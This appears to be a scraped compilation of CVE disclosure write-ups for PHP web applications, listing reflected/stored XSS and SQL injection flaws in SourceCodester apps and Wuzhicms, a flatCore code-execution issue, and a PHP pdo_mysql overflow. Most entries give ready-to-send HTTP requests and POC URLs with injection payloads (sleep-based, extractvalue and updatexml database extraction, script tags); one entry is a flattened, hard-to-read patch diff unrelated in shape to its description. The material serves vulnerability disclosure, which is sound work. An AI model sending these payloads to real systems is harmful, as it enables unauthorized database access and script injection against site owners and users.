Online Fire Reporting System v1.0 is vulnerable to Cross Site Scripting (XSS) via /ofrs/classes/Master.php.

Permalink

**online-fire-reporting-system - Cross-site Scripting (XSS)**

vendors: https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html

Date: 2022-05-07

Vulnerability File: /ofrs/classes/Master.php

Vulnerability location: /ofrs/classes/Master.php?f=save\_team, code

\[+\] Payload: <sCrIpT>alert(1)</sCrIpT>

Tested on Windows 10, XAMPP

    POST http://192.168.2.102/ofrs/classes/Master.php?f=save_team HTTP/1.1
    Host: 192.168.2.102
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en,zh-CN;q=0.8,zh;q=0.7,zh-TW;q=0.5,zh-HK;q=0.3,en-US;q=0.2
    X-Requested-With: XMLHttpRequest
    Content-Type: multipart/form-data; boundary=---------------------------12232441784418479012629232838
    Content-Length: 660
    Origin: http://192.168.2.102
    Connection: close
    Referer: http://192.168.2.102/ofrs/admin/?page=teams/manage_team&id=6
    Cookie: PHPSESSID=vpohrtulukshjgjlje1jbeavrj
    
    -----------------------------12232441784418479012629232838
    Content-Disposition: form-data; name="id"
    
    6
    -----------------------------12232441784418479012629232838
    Content-Disposition: form-data; name="code"
    
    <sCrIpT>alert(1)</sCrIpT>
    -----------------------------12232441784418479012629232838
    Content-Disposition: form-data; name="leader_name"
    
    asd
    -----------------------------12232441784418479012629232838
    Content-Disposition: form-data; name="leader_contact"
    
    asd
    -----------------------------12232441784418479012629232838
    Content-Disposition: form-data; name="members"
    
    asd
    -----------------------------12232441784418479012629232838--

CVE-2022-31906: 0525/xss.md at main · mikeccltt/0525

Student Registration and Fee Payment System v1.0 is vulnerable to SQL Injection via /scms/student.php.

Permalink

Cannot retrieve contributors at this time

**student-registration-and-fee-payment-system v1.0 has SQL injection**

vendors: https://www.sourcecodester.com/php/15355/student-registration-and-fee-payment-system-php-mysql.html

Date: 2022-05-07

Vulnerability File: /scms/student.php

Vulnerability location:/scms/student.php, id

\[+\] Payload: 5'and(select\*from(select+sleep(3))a/**/union/**/select+1)='

Tested on Windows 10, XAMPP

    GET http://192.168.2.102/scms/student.php?action=delete&id=5'and(select*from(select+sleep(3))a/**/union/**/select+1)=' HTTP/1.1
    Host: 192.168.2.102
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en,zh-CN;q=0.8,zh;q=0.7,zh-TW;q=0.5,zh-HK;q=0.3,en-US;q=0.2
    Connection: close
    Referer: http://192.168.2.102/scms/student.php?act=2
    Cookie: PHPSESSID=vpohrtulukshjgjlje1jbeavrj
    Upgrade-Insecure-Requests: 1

CVE-2022-31908: 0525/sql.md at main · mikeccltt/0525

Online Discussion Forum Site v1.0 is vulnerable to Cross Site Scripting (XSS) via /odfs/classes/Master.php?f=save_category, name.

Permalink

**online-discussion-forum-site - Cross-site Scripting (XSS)**

vendors: https://www.sourcecodester.com/php/15337/online-discussion-forum-site-phpoop-free-source-code.html

Date: 2022-05-07

Vulnerability File: /odfs/classes/Master.php

Vulnerability location: /odfs/classes/Master.php?f=save\_category, name

\[+\] Payload: <sCrIpT>alert(1)</sCrIpT>

Tested on Windows 10, XAMPP

    POST http://192.168.2.102/odfs/classes/Master.php?f=save_category HTTP/1.1
    Host: 192.168.2.102
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en,zh-CN;q=0.8,zh;q=0.7,zh-TW;q=0.5,zh-HK;q=0.3,en-US;q=0.2
    X-Requested-With: XMLHttpRequest
    Content-Type: multipart/form-data; boundary=---------------------------1173846977850966238533383019
    Content-Length: 743
    Origin: http://192.168.2.102
    Connection: close
    Referer: http://192.168.2.102/odfs/admin/?page=categories
    Cookie: PHPSESSID=vpohrtulukshjgjlje1jbeavrj
    
    -----------------------------1173846977850966238533383019
    Content-Disposition: form-data; name="id"
    
    3
    -----------------------------1173846977850966238533383019
    Content-Disposition: form-data; name="name"
    
    <sCrIpT>alert(1)</sCrIpT>
    -----------------------------1173846977850966238533383019
    Content-Disposition: form-data; name="description"
    
    Python is a high-level, interpreted, general-purpose programming language. Its design philosophy emphasizes code readability with the use of significant indentation. Python is dynamically-typed and garbage-collected.
    -----------------------------1173846977850966238533383019
    Content-Disposition: form-data; name="status"
    
    1
    -----------------------------1173846977850966238533383019--

CVE-2022-31913: 0525/xss.md at main · mikeccltt/0525

Online Tutor Portal Site v1.0 is vulnerable to SQL Injection via /otps/classes/Master.php?f=delete_team.

Permalink

Cannot retrieve contributors at this time

**online-tutor-portal-site v1.0 has SQL injection**

vendors: https://www.sourcecodester.com/php/15339/online-tutor-portal-site-phpopp-free-source-code.html

Date: 2022-05-07

Vulnerability File: /otps/classes/Master.php?f=delete\_team

Vulnerability location:/otps/classes/Master.php?f=delete\_course, id

\[+\] Payload: 2'and/\*\*/extractvalue(1,concat(char(126),database()))and'

Tested on Windows 10, XAMPP

    POST http://192.168.2.102/otps/classes/Master.php?f=delete_course HTTP/1.1
    Host: 192.168.2.102
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en,zh-CN;q=0.8,zh;q=0.7,zh-TW;q=0.5,zh-HK;q=0.3,en-US;q=0.2
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 60
    Origin: http://192.168.2.102
    Connection: close
    Referer: http://192.168.2.102/otps/admin/?page=courses
    Cookie: PHPSESSID=vpohrtulukshjgjlje1jbeavrj
    
    id=2'and/**/extractvalue(1,concat(char(126),database()))and'

CVE-2022-31912: 0525/sql.md at main · mikeccltt/0525

Online Discussion Forum Site v1.0 is vulnerable to SQL Injection via /odfs/classes/Master.php?f=delete_team.

Permalink

Cannot retrieve contributors at this time

**online-discussion-forum-site v1.0 has SQL injection**

vendors: https://www.sourcecodester.com/php/15337/online-discussion-forum-site-phpoop-free-source-code.html

Date: 2022-05-07

Vulnerability File: /odfs/classes/Master.php?f=delete\_team

Vulnerability location:/odfs/classes/Master.php?f=delete\_category, id

\[+\] Payload: 2'and/\*\*/extractvalue(1,concat(char(126),database()))and'

Tested on Windows 10, XAMPP

    POST http://192.168.2.102/odfs/classes/Master.php?f=delete_category HTTP/1.1
    Host: 192.168.2.102
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en,zh-CN;q=0.8,zh;q=0.7,zh-TW;q=0.5,zh-HK;q=0.3,en-US;q=0.2
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 60
    Origin: http://192.168.2.102
    Connection: close
    Referer: http://192.168.2.102/odfs/admin/?page=categories
    Cookie: PHPSESSID=vpohrtulukshjgjlje1jbeavrj
    
    id=2'and/**/extractvalue(1,concat(char(126),database()))and'

CVE-2022-31911: 0525/sql.md at main · mikeccltt/0525

Online Tutor Portal Site v1.0 is vulnerable to Cross Site Scripting (XSS). via /otps/classes/Master.php.

Permalink

Cannot retrieve contributors at this time

**online-tutor-portal-site - Cross-site Scripting (XSS)**

vendors: https://www.sourcecodester.com/php/15339/online-tutor-portal-site-phpopp-free-source-code.html

Date: 2022-05-07

Vulnerability File: /otps/classes/Master.php

Vulnerability location: /otps/classes/Master.php?f=save\_course, name

\[+\] Payload: <sCrIpT>alert(1)</sCrIpT>

Tested on Windows 10, XAMPP

    POST http://192.168.2.102/otps/classes/Master.php?f=save_course HTTP/1.1
    Host: 192.168.2.102
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en,zh-CN;q=0.8,zh;q=0.7,zh-TW;q=0.5,zh-HK;q=0.3,en-US;q=0.2
    X-Requested-With: XMLHttpRequest
    Content-Type: multipart/form-data; boundary=---------------------------23528694527160792041879147157
    Content-Length: 940
    Origin: http://192.168.2.102
    Connection: close
    Referer: http://192.168.2.102/otps/admin/?page=courses
    Cookie: PHPSESSID=vpohrtulukshjgjlje1jbeavrj
    
    -----------------------------23528694527160792041879147157
    Content-Disposition: form-data; name="id"
    
    6
    -----------------------------23528694527160792041879147157
    Content-Disposition: form-data; name="tutor_id"
    
    4
    -----------------------------23528694527160792041879147157
    Content-Disposition: form-data; name="name"
    
    <sCrIpT>alert(1)</sCrIpT>
    -----------------------------23528694527160792041879147157
    Content-Disposition: form-data; name="description"
    
    Sample Course 102
    -----------------------------23528694527160792041879147157
    Content-Disposition: form-data; name="experience"
    
    5
    -----------------------------23528694527160792041879147157
    Content-Disposition: form-data; name="status"
    
    0
    -----------------------------23528694527160792041879147157
    Content-Disposition: form-data; name="img"; filename=""
    Content-Type: application/octet-stream
    
    
    -----------------------------23528694527160792041879147157--

CVE-2022-31910: 0525/xss.md at main · mikeccltt/0525

Wiris Mathtype v7.28.0 was discovered to contain a path traversal vulnerability in the resourceFile parameter. This vulnerability is exploited via a crafted request to the resource handler.

@@ -1,10 +1,9 @@ <?php  
class com\_wiris\_util\_json\_JSon extends com\_wiris\_util\_json\_StringParser { class com\_wiris\_util\_json\_JSon { public function \_\_construct() { if(!php\_Boot::$skip\_constructor) { parent::\_\_construct(); }} ; } public function newLine($depth, $sb) { $sb\->add("\\x0D\\x0A"); $i = null; @@ -21,195 +20,6 @@ public function newLine($depth, $sb) { public function setAddNewLines($addNewLines) { $this\->addNewLines = $addNewLines; } public function decodeArray() { $v = new \_hx\_array(array()); $this\->nextToken(); $this\->skipBlanks(); if($this\->c === 93) { $this\->nextToken(); return $v; } while($this\->c !== 93) { $o = $this\->localDecode(); $v\->push($o); $this\->skipBlanks(); if($this\->c === 44) { $this\->nextToken(); $this\->skipBlanks(); } else { if($this\->c !== 93) { throw new HException("Expected ',' or '\]'."); } } unset($o); } $this\->nextToken(); return $v; } public function decodeHash() { $h = new Hash(); $this\->nextToken(); $this\->skipBlanks(); if($this\->c === 125) { $this\->nextToken(); return $h; } while($this\->c !== 125) { $key = $this\->decodeString(); $this\->skipBlanks(); if($this\->c !== 58) { throw new HException("Expected ':'."); } $this\->nextToken(); $this\->skipBlanks(); $o = $this\->localDecode(); $h\->set($key, $o); $this\->skipBlanks(); if($this\->c === 44) { $this\->nextToken(); $this\->skipBlanks(); } else { if($this\->c !== 125) { throw new HException("Expected ',' or '}'. " . $this\->getPositionRepresentation()); } } unset($o,$key); } $this\->nextToken(); return $h; } public function decodeNumber() { $sb = new StringBuf(); $hex = false; $floating = false; do { $sb\->add(com\_wiris\_util\_json\_JSon\_0($this, $floating, $hex, $sb)); $this\->nextToken(); if($this\->c === 120) { $hex = true; $sb\->add(com\_wiris\_util\_json\_JSon\_1($this, $floating, $hex, $sb)); $this\->nextToken(); } if($this\->c === 46 || $this\->c === 69 || $this\->c === 101) { $floating = true; } } while($this\->c >= 48 && $this\->c <= 58 || $hex && $this\->isHexDigit($this\->c) || $floating && ($this\->c === 46 || $this\->c === 69 || $this\->c === 101 || $this\->c === 43 || $this\->c === 45)); if($floating) { return Std::parseFloat($sb\->b); } else { return Std::parseInt($sb\->b); } } public function decodeString() { $sb = new StringBuf(); $d = $this\->c; $this\->nextToken(); while($this\->c !== $d) { if($this\->c === 92) { $this\->nextToken(); if($this\->c === 110) { $sb\->add("\\x0A"); } else { if($this\->c === 114) { $sb\->add("\\x0D"); } else { if($this\->c === 34) { $sb\->add("\\""); } else { if($this\->c === 39) { $sb\->add("'"); } else { if($this\->c === 116) { $sb\->add("\\x09"); } else { if($this\->c === 92) { $sb\->add("\\\\"); } else { if($this\->c === 117) { $this\->nextToken(); $code = com\_wiris\_util\_json\_JSon\_2($this, $d, $sb); $this\->nextToken(); $code .= com\_wiris\_util\_json\_JSon\_3($this, $code, $d, $sb); $this\->nextToken(); $code .= com\_wiris\_util\_json\_JSon\_4($this, $code, $d, $sb); $this\->nextToken(); $code .= com\_wiris\_util\_json\_JSon\_5($this, $code, $d, $sb); $dec = Std::parseInt("0x" . $code); $sb\->add(com\_wiris\_util\_json\_JSon\_6($this, $code, $d, $dec, $sb)); unset($dec,$code); } else { throw new HException("Unknown scape sequence '\\\\" . com\_wiris\_util\_json\_JSon\_7($this, $d, $sb) . "'"); } } } } } } } } else { $sb\->add(com\_wiris\_util\_json\_JSon\_8($this, $d, $sb)); } $this\->nextToken(); } $this\->nextToken(); return $sb\->b; } public function decodeBooleanOrNull() { $sb = new StringBuf(); while(com\_wiris\_util\_xml\_WCharacterBase::isLetter($this\->c)) { $sb\->b .= chr($this\->c); $this\->nextToken(); } $word = $sb\->b; if($word === "true") { return true; } else { if($word === "false") { return false; } else { if($word === "null") { return null; } else { throw new HException("Unrecognized keyword \\"" . $word . "\\"."); } } } } public function localDecode() { $this\->skipBlanks(); if($this\->c === 123) { return $this\->decodeHash(); } else { if($this\->c === 91) { return $this\->decodeArray(); } else { if($this\->c === 34) { return $this\->decodeString(); } else { if($this\->c === 39) { return $this\->decodeString(); } else { if($this\->c === 45 || $this\->c >= 48 && $this\->c <= 58) { return $this\->decodeNumber(); } else { if($this\->c === 116 || $this\->c === 102 || $this\->c === 110) { return $this\->decodeBooleanOrNull(); } else { throw new HException("Unrecognized char " . \_hx\_string\_rec($this\->c, "")); } } } } } } } public function localDecodeString($str) { $this\->init($str); return $this\->localDecode(); } public function encodeIntegerFormat($sb, $i) { $sb\->add($i\->toString()); } public function encodeLong($sb, $i) { $sb\->add("" . Std::string($i)); } @@ -361,17 +171,13 @@ public function encodeImpl($sb, $o) { if(Std::is($o, \_hx\_qtype("haxe.Int64"))) { $this\->encodeLong($sb, $o); } else { if(Std::is($o, \_hx\_qtype("com.wiris.util.json.JSonIntegerFormat"))) { $this\->encodeIntegerFormat($sb, $o); if(com\_wiris\_system\_TypeTools::isBool($o)) { $this\->encodeBoolean($sb, com\_wiris\_system\_TypeTools::toBool($o)); } else { if(Std::is($o, \_hx\_qtype("Bool"))) { $this\->encodeBoolean($sb, $o); if(Std::is($o, \_hx\_qtype("Float"))) { $this\->encodeFloat($sb, $o); } else { if(Std::is($o, \_hx\_qtype("Float"))) { $this\->encodeFloat($sb, $o); } else { throw new HException("Impossible to convert to json object of type " . Std::string(Type::getClass($o))); } throw new HException("Impossible to convert to json object of type " . Std::string(Type::getClass($o))); } } } @@ -403,15 +209,19 @@ public function \_\_call($m, $a) { else throw new HException('Unable to call «'.$m.'»'); } static function sb() { $»args = func\_get\_args(); return call\_user\_func\_array(self::$sb, $»args); } static $sb; static function encode($o) { $js = new com\_wiris\_util\_json\_JSon(); return $js\->encodeObject($o); } static function decode($str) { $json = new com\_wiris\_util\_json\_JSon(); return $json\->localDecodeString($str); try { return com\_wiris\_util\_json\_parser\_JsonParse::parse($str); }catch(Exception $»e) { $\_ex\_ = ($»e instanceof HException) ? $»e\->e : $»e; if(($e = $\_ex\_) instanceof com\_wiris\_system\_Exception){ throw new HException($e\->getMessage()); } else throw $»e;; } } static function getDepth($o) { if(com\_wiris\_system\_TypeTools::isHash($o)) { @@ -502,66 +312,3 @@ static function isJson($json) { } function \_\_toString() { return 'com.wiris.util.json.JSon'; } } function com\_wiris\_util\_json\_JSon\_0(&$»this, &$floating, &$hex, &$sb) { { $s = new haxe\_Utf8(null); $s\->addChar($»this\->c); return $s\->toString(); } } function com\_wiris\_util\_json\_JSon\_1(&$»this, &$floating, &$hex, &$sb) { { $s = new haxe\_Utf8(null); $s\->addChar($»this\->c); return $s\->toString(); } } function com\_wiris\_util\_json\_JSon\_2(&$»this, &$d, &$sb) { { $s = new haxe\_Utf8(null); $s\->addChar($»this\->c); return $s\->toString(); } } function com\_wiris\_util\_json\_JSon\_3(&$»this, &$code, &$d, &$sb) { { $s = new haxe\_Utf8(null); $s\->addChar($»this\->c); return $s\->toString(); } } function com\_wiris\_util\_json\_JSon\_4(&$»this, &$code, &$d, &$sb) { { $s = new haxe\_Utf8(null); $s\->addChar($»this\->c); return $s\->toString(); } } function com\_wiris\_util\_json\_JSon\_5(&$»this, &$code, &$d, &$sb) { { $s = new haxe\_Utf8(null); $s\->addChar($»this\->c); return $s\->toString(); } } function com\_wiris\_util\_json\_JSon\_6(&$»this, &$code, &$d, &$dec, &$sb) { { $s = new haxe\_Utf8(null); $s\->addChar($dec); return $s\->toString(); } } function com\_wiris\_util\_json\_JSon\_7(&$»this, &$d, &$sb) { { $s = new haxe\_Utf8(null); $s\->addChar($»this\->c); return $s\->toString(); } } function com\_wiris\_util\_json\_JSon\_8(&$»this, &$d, &$sb) { { $s = new haxe\_Utf8(null); $s\->addChar($»this\->c); return $s\->toString(); } }

CVE-2022-31372: chore: update PHP integration to 7.28.1 · wiris/moodle-filter_wiris@037ce9c

SQL injection vulnerabilities exist in Wuzhicms v4.1.0 which allows attackers to execute arbitrary SQL commands via the $keyValue parameter in /coreframe/app/pay/admin/index.php

**There are 3 SQL injections in Wuzhicms v4.1.0 background****one****Wuzhicms v4.1.0 /coreframe/app/pay/admin/index.php hava a SQL Injection Vulnerability****Vulnerability file:**

/coreframe/app/pay/admin/index.php 30-98

	public function listing(){
		$fieldtypes = array('订单号', '手机号', '所属客服', '经销商');
		$keytype = isset($GLOBALS\['keytype'\]) ? intval($GLOBALS\['keytype'\]) : 0;
		$payments = $this\->payments;
		$status\_arr = $this\->status\_arr;
		$page = isset($GLOBALS\['page'\]) ? intval($GLOBALS\['page'\]) : 1;
		$page = max($page, 1);
		$status = $GLOBALS\['status'\];

		if ($status) {
			$where = 'status=' . $status;
		} else {
			$where = 'status>0';
		}
		if ($keytype) {
			$where .= " AND \`keytype\`='$keytype'";
		}
		$keyValue = strip\_tags($GLOBALS\['keyValue'\]);
		$fieldtype = intval($GLOBALS\['fieldtype'\]);
		if ($keyValue) {
			switch ($fieldtype) {
				case 0:
					$where .= " AND \`order\_no\`='$keyValue'";
					break;
				case 1:
					$where .= " AND \`telephone\`='$keyValue'";
					break;
				case 2:
					$where .= " AND \`kf\_username\`='$keyValue'";
					break;
				case 3:
					$where .= " AND \`jxs\_username\`='$keyValue'";
					break;
			}
		}

		if ($\_SESSION\['role'\] == 4) {
			//客服
			$kf\_username = get\_cookie('username');
			$where .= " AND \`kf\_username\`='$kf\_username'";
		}
		$starttime = '';
		$endtime = '';
		if ($GLOBALS\['starttime'\]) {
			$starttime = strtotime($GLOBALS\['starttime'\]);
			$where .= " AND \`addtime\`>'$starttime'";
		}
		if ($GLOBALS\['endtime'\]) {
			$endtime = strtotime($GLOBALS\['endtime'\]);
			$where .= " AND \`endtime\`<'$endtime'";
		}
		if(isset($GLOBALS\['exp'\])) {
			$pagesize = 1000;
		} else {
			$pagesize = 20;
		}

		$admin\_result = $this\->db\->get\_list('admin', array('role' => 4), '\*', 0, 20, 0);
		$result = $this\->db\->get\_list('pay', $where, '\*', 0, $pagesize, $page, 'id DESC');
		if(isset($GLOBALS\['exp'\])) {
			$this\->export\_excel($result);
		}
		$pages = $this\->db\->pages;
		$total = $this\->db\->number;
		$pay\_config = get\_config('pay\_config');
		load\_class('form');

		include $this\->template('listing');
	}

the $keyValueparameter is not strictly filtered, causing SQL injection vulnerabilities!

**POC**

    /index.php?m=pay&f=index&v=listing&_su=wuzhicms&keyValue=1111'/**/union/**/select/**/updatexml(1,concat(0x7e,(select DATABASE()),0x7e),1);-- -
    

**two**

The second SQL injection and the first SQL injection are in a different function in the same file!

**Wuzhicms v4.1.0 /coreframe/app/pay/admin/index.php hava a SQL Injection Vulnerability****Vulnerability file:**

/coreframe/app/pay/admin/index.php 244-289

public function relay(){
		$id = intval($GLOBALS\['id'\]);
		$r = $this\->db\->get\_one('pay', array('id' => $id));
		$r2 = $this\->db\->get\_one('pay\_detail', array('id' => $id));
		$r = array\_merge($r, $r2);
		$keyValue = '';
		$keyType = '';
		if (isset($GLOBALS\['keyType'\])) {
			$keyType = $GLOBALS\['keyType'\];
			$keyValue = $GLOBALS\['keyValue'\];
			if ($keyValue) {
				$where = "modelid=11 AND \`$keyType\` LIKE '%$keyValue%'";
				$result = $this\->db\->get\_list('member', $where, '\*', 0, 20, 0, 'uid DESC');
			}
		} elseif (isset($GLOBALS\['submit'\])) {
			load\_function('common', 'pay');
			$formdata = array();
			$formdata\['order\_no'\] = create\_order\_no();
			$formdata\['to\_uid'\] = intval($GLOBALS\['to\_uid'\]);
			$formdata\['username'\] = $r\['linkman'\];
			$formdata\['mobile'\] = $r\['telephone'\];
			$formdata\['pinpai'\] = $r\['data1'\];
			$formdata\['chexing'\] = $r\['data3'\];
			$formdata\['addtime'\] = $r\['addtime'\];
			$formdata\['keytype'\] = 0;//游客订单
			$formdata\['zftime'\] = SYS\_TIME;
			$this\->db\->insert('demand\_relay', $formdata);
			$formdata2 = array();
			$formdata2\['op\_uid'\] = $\_SESSION\['uid'\];
			$formdata2\['to\_uid'\] = intval($GLOBALS\['to\_uid'\]);
			$formdata2\['to\_username'\] = $GLOBALS\['to\_username'\];
			$formdata2\['updatetime'\] = SYS\_TIME;
			$this\->db\->insert('demand\_history', $formdata2);
			// $this->db->update('demand', array('flag'=>1),array('did' => $did));
			$this\->db\->update('pay', array('jxs\_username' => $formdata2\['to\_username'\]), array('id' => $id));
			$forward = strip\_tags($GLOBALS\['forward'\]);
			MSG('发送成功', $forward);
		} else {
			$uid = $\_SESSION\['uid'\];
			$where = "op\_uid='$uid'";
			$data = $this\->db\->get\_one('demand\_history', $where, '\*', 0, 'hid DESC');
			$forward = strip\_tags($GLOBALS\['forward'\]);

		}
		include $this\->template('pay\_relay');
	}

Set $keyType=uid  and $keyValue to be controllable.

the $keyValueparameter is not strictly filtered, causing SQL injection vulnerabilities!

**POC**

    /index.php?m=pay&f=index&v=relay&_su=wuzhicms&keyType=uid&keyValue=111'/**/union/**/select/**/updatexml(1,concat(0x7e,(select DATABASE()),0x7e),1);-- -
    

**three****Wuzhicms v4.1.0 /coreframe/app/order/admin/index.php hava a SQL Injection Vulnerability**

Someone has submitted a SQL injection vulnerability in the file /coreframe/app/order/admin/index.php before (#175), but I found that in addition to the $flag parameter, it can be injected In addition, the $keyValue parameter can also be injected!

**Vulnerability file:**

coreframe/app/order/admin/index.php 22-87

public function listing() {
    load\_class('form');
    $fieldtypes = array('订单ID','标题','下单会员','物流单号');
    $flag = $GLOBALS\['flag'\];
    $status = array();
    $status\[1\] = '待发货';
    $status\[2\] = '已发货';
    $status\[3\] = '订单完成';

    $status\_arr = $this\->status\_arr;
    $page = isset($GLOBALS\['page'\]) ? intval($GLOBALS\['page'\]) : 1;
    $page = max($page,1);
    $keyValue = strip\_tags($GLOBALS\['keyValue'\]);
    $fieldtype = intval($GLOBALS\['fieldtype'\]);
    $where = '1';
    if($keyValue) {
        switch($fieldtype) {
            case 0:
                $where .= " AND \`order\_no\`='$keyValue'";
                break;
            case 1:
                $where .= " AND \`remark\` LIKE '%$keyValue%'";
                break;
            case 2:
                $r = $this\->db\->get\_one('member', array('username' => $keyValue));
                $uid = $r\['uid'\];
                $where .= " AND \`uid\`='$uid'";
                break;
            case 3:
                $where .= " AND \`snid\`='$keyValue'";
                break;
        }
    }
    if($flag!='' && $flag\==0 || $flag) $where .=" AND \`status\`='$flag'";
    $starttime = '';
    $endtime = '';
    if($GLOBALS\['starttime'\]) {
        $starttime = strtotime($GLOBALS\['starttime'\]);
        $where .= " AND \`addtime\`>'$starttime'";
    }
    if($GLOBALS\['endtime'\]) {
        $endtime = strtotime($GLOBALS\['endtime'\]);
        $where .= " AND \`addtime\`<'$endtime'";
    }
    $result\_arr = $this\->db\->get\_list('order\_point', $where, '\*', 0, 20,$page,'orderid DESC');

Set $fieldtype\=1 and $keyValue to be controllable.

the $keyValueparameter is not strictly filtered, causing SQL injection vulnerabilities!

**POC**

    http://yyds.upload/index.php?m=order&f=index&v=listing&_su=wuzhicms&keyValue=111'/**/union/**/select/**/updatexml(1,concat(0x7e,(select DATABASE()),0x7e),1);-- -&fieldtype=1
    

    Multiple SQL injection vulnerabilities exist in wuzhicms v4.1.0
    Allows attackers to execute arbitrary SQL commands via the $keyValue parameter in the (1) / core / APP / order / admin / index.php file and the $keyValue parameter in the (2) / core / APP / pay / admin / index.php file.
    

    https://github.com/wuzhicms/wuzhicms/issues/198
    
    

    Vulnerability verification process(https://github.com/wuzhicms/wuzhicms/issues/198)
    
    Use sql injection to elevate permissions and write webshell
    Individual

CVE-2021-41654: There are 3 SQL injections in Wuzhicms v4.1.0 background · Issue #198 · wuzhicms/wuzhicms

flatCore-CMS v2.0.8 has a code execution vulnerability, which could let a remote malicious user execute arbitrary PHP code.

**Describe the bug**  
Code execution vulnerabilities in the background

**To Reproduce**  
Steps to reproduce the behavior:  
1.Log in to the background  
2.Go to /acp/acp.php?tn=pages&sub=new#position  
3.Click info and enter the malicious php code in the Permalink parameter to jump out of the structure to execute the malicious code  
4.Click save  
5./content/cache/active\_urls.php and /content/cache/cache\_lastedit.php files will be inserted with malicious code  
6.Visit the homepage and you will see that the malicious code we inserted was successfully executed and returned the result

**Screenshots**

Click Save New Page

/content/cache/active\_urls.php and /content/cache/cache\_lastedit.php files will be inserted with malicious code

**Desktop (please complete the following information):**

*   OS: MacOS
*   Browser All
*   Version Last version

CVE-2021-41402: Code execution vulnerabilities in the background · Issue #59 · flatCore/flatCore-CMS

In PHP versions 7.4.x below 7.4.30, 8.0.x below 8.0.20, and 8.1.x below 8.1.7, when pdo_mysql extension with mysqlnd driver, if the third party is allowed to supply host to connect to and the password for the connection, password of excessive length can trigger a buffer overflow in PHP, which can lead to a remote code execution vulnerability.

Tag

#php